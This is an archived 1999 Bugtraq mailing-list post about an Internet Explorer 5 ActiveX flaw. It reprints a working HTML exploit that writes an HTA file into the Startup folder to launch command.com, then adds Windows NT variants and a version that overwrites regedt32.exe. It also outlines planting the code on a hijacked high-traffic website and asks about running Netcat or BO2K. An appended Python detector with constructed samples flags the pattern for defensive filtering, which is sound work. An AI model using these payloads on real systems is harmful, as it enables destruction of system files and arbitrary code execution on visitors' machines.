Bugtraq mailing list archives

Re: IE5 allows executing programs


From: SysAdmin () SASSPRODUCTIONS COM (SysAdmin)
Date: Sun, 29 Aug 1999 16:24:22 -0400


Okay, I haven't seen any interesting observations yet as to the value of
this exploit or the potential damage it contains. This exploit allows for
the OVERWRITING of any application you choose, WITHOUT the system objecting.
I haven't tested it against anything specific yet, except for a trial run
against Regedit. The key is to select a specific path in which a known file
resides, such as C:\winnt\system32, and then you give the .hta file the name
of the file you want overwritten. Here's the code originally included:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"+
  "<SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');"+
  "wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>

If you wanted this to run against an NT machine, then:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object><script>
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\Startup\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"+
  "<SCRIPT>alert('Screw Denise Richards, Debbie Johnson r0x!');"+
  "wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>

For all those arguing about figuring out which user it should be addressed
to, the answer is "All Users".

Now watch as I modify this to destroy Regedit 32:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object><script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\regedt32.exe";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"+
  "<SCRIPT>alert('Screw Denise Richards, Debbie Johnson r0x!');"+
  "wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>

As you can see, the simple malicious damage is unprecedented; good luck
trying to figure out what's happened when your computers have crashed,
permanently. Now let me give you a simple scenario for a real-world example.
Let's say a cracker, we'll call him Ahab, decides to take over ABC's or
Symantec's web page; not that difficult to imagine. Without ever breaking
the firewall, all he has to do is modify the web page. Now, usually they
detect the obscene message within minutes and take it offline. Imagine, though,
if Ahab just modified the source: he could include in it both ActiveX
exploits, for NT and 98, and in addition he could add to the source an
instruction to change to another web page in 5 seconds, a page he's added to
InetPub. This new page would include the even more recent exploit that
crashes IE5 with a form field overflow. Imagine how long it would take for
anyone to realize that the web page had been hacked; their computers would
freeze every time they went there for no apparent reason (the new exploit
doesn't display the page that froze your browser, only the page before). All
of those home users, the thousands of hits a day they'd be getting, would
simply connect to the site, get their system kernel overwritten and have
their browser crashed, forcing a restart for the home user. Does everyone
see the potential damage here?

Has anyone figured out if an arbitrary binary could be executed? Such as
Netcat or BO2K? Also, I understand Outlook executes this code immediately; is
it possible that this same code could cause someone's system to crash merely
by opening the e-mail?

Seth Georgion

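As an added defensive example (my own code, not from this post or the thread): a small Python detector for the pattern the post describes, flagging HTML/HTA documents that instantiate the Scriptlet.TypeLib control (CLSID 06290BD5-48AA-11D2-8432-006008C3FBFC) or WScript.Shell (F935DC22-1CF0-11D0-ADB9-00C04FD58A0B) and drop a file via .Path/.write() into a Startup folder or over a system binary. The sample documents are constructed, and the path heuristics are my own assumptions.

```python
import re

# CLSIDs of the two ActiveX controls bound in the posted exploit ("scr" and "wsh").
SCRIPTLET_TYPELIB = "06290BD5-48AA-11D2-8432-006008C3FBFC"
WSCRIPT_SHELL = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
CLSID_RE = re.compile(r"clsid:\s*\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
PATH_RE = re.compile(r"\.Path\s*=\s*([\"'])(.*?)\1", re.I | re.S)   # scr.Path = "..."
WRITE_RE = re.compile(r"\.write\s*\(", re.I)                          # scr.write()
RUN_RE = re.compile(r"\.Run\s*\(", re.I)                              # wsh.Run(...)
# Drop locations the post discusses (assumed heuristics): Startup folders and system binaries.
STARTUP_RE = re.compile(r"\\Start ?Menu\\Programs\\Start-?Up\\", re.I)
SYSTEM_BIN_RE = re.compile(r"\\(?:system32|system|windows|winnt)\\[^\\]+\.(?:exe|dll|com)$", re.I)

def js_unescape(s):  # collapse the doubled backslashes of a JS string literal to a path
    return s.replace("\\\\", "\\")

def scan(doc):
    """Classify an HTML/HTA document; returns the target path, CLSIDs and reasons."""
    clsids = {c.upper() for c in CLSID_RE.findall(doc)}
    m = PATH_RE.search(doc)
    target = js_unescape(m.group(2)) if m else None
    reasons = []
    if SCRIPTLET_TYPELIB in clsids:
        reasons.append("Scriptlet.TypeLib instantiated")
    if WSCRIPT_SHELL in clsids:
        reasons.append("WScript.Shell instantiated")
    if SCRIPTLET_TYPELIB in clsids and target and WRITE_RE.search(doc):
        reasons.append("file write via .Path/.write")
        if STARTUP_RE.search(target):
            reasons.append("target is a Startup folder (autorun at next logon)")
        elif SYSTEM_BIN_RE.search(target):
            reasons.append("target overwrites a system binary")
    if WSCRIPT_SHELL in clsids and RUN_RE.search(doc):
        reasons.append("WScript.Shell.Run present")
    return {"target": target, "clsids": sorted(clsids), "reasons": reasons,
            "malicious": "file write via .Path/.write" in reasons}

# Constructed samples (not copied from the post): a Startup-folder drop, a
# system-binary overwrite, and a benign page that merely calls document.write().
SAMPLE_STARTUP = ("<object id='scr' classid='clsid:06290bd5-48aa-11d2-8432-006008c3fbfc'></object>"
    "<script>scr.Reset();scr.Path=\"C:\\\\WINNT\\\\Profiles\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\x.hta\";"
    "scr.Doc=\"<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>\";scr.write();</script>")
SAMPLE_OVERWRITE = ("<object id='scr' classid='clsid:06290BD5-48AA-11D2-8432-006008C3FBFC'></object>"
    "<script>scr.Path=\"C:\\\\WINNT\\\\System32\\\\regedt32.exe\";scr.Doc=\"junk\";scr.write();</script>")
SAMPLE_BENIGN = "<script>document.write('<p>hello</p>');</script>"

if __name__ == "__main__":
    for name, doc in [("startup", SAMPLE_STARTUP), ("overwrite", SAMPLE_OVERWRITE), ("benign", SAMPLE_BENIGN)]:
        print(name, scan(doc))
```

A mail gateway or proxy filter can run the same check over message bodies, which also covers the Outlook preview-pane case raised in the post.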